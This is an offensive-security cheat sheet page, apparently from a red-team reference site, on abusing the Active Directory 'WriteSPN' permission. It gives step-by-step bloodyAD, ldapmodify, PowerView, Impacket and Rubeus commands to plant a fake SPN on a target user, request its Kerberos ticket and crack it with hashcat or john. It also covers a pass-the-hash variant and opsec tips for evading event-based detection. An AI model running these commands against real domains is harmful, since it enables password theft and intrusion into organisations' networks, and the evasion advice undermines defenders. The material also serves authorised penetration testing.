🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🩸 BloodHound / WriteSPN

WriteSPN

Source can write the servicePrincipalName attribute on the target user, enabling targeted Kerberoasting

Applies to: User/Group/Computer β†’ User

Linux Abuse

Step 1: Write a fake SPN to the target user

bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> \
    set object <target-user> servicePrincipalName -v 'http/fakespn.<domain>'

Step 2: Request TGS ticket (Kerberoast)

GetUserSPNs.py <domain>/<username>:'<password>' -dc-ip <dc-ip> \
    -request-user <target-user> -outputfile <target-user>_tgs.txt

Step 3: Crack

hashcat -m 13100 <target-user>_tgs.txt /usr/share/wordlists/rockyou.txt
john <target-user>_tgs.txt --wordlist=/usr/share/wordlists/rockyou.txt

Step 4: Cleanup (remove fake SPN)

bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> \
    remove object <target-user> servicePrincipalName -v 'http/fakespn.<domain>'

With hash (pass-the-hash variant)

bloodyad -u <username> --hashes :<ntlm-hash> -d <domain> --host <dc-ip> \
    set object <target-user> servicePrincipalName -v 'http/fakespn.<domain>'

GetUserSPNs.py -hashes :<ntlm-hash> <domain>/<username> -dc-ip <dc-ip> \
    -request-user <target-user> -outputfile <target-user>_tgs.txt

Via ldapmodify

ldapmodify -H ldap://<dc-ip> -D '<username>@<domain>' -w '<password>' <<EOF
dn: CN=<target-user>,CN=Users,DC=<domain>,DC=<tld>
changetype: modify
add: servicePrincipalName
servicePrincipalName: http/fakespn.<domain>
EOF

Windows Abuse

Step 1: Set SPN

Set-DomainObject -Identity <target-user> -Set @{serviceprincipalname='http/fakespn.<domain>'} -Credential $cred

Step 2: Kerberoast

Get-DomainSPNTicket -Identity <target-user> -OutputFormat Hashcat | Select-Object -ExpandProperty Hash

Step 2 alt: Rubeus

Rubeus.exe kerberoast /user:<target-user> /nowrap /format:hashcat

Step 3: Cleanup

Set-DomainObject -Identity <target-user> -Clear serviceprincipalname -Credential $cred

Opsec

  • SPN add generates a 4662 LDAP modify event and can be caught by detections watching for SPN writes on user objects (not computer accounts)
  • Remove the SPN immediately after obtaining the hash to minimize exposure window
  • Prefer targeting users with weak/crackable passwords; if the account has a strong password this technique yields nothing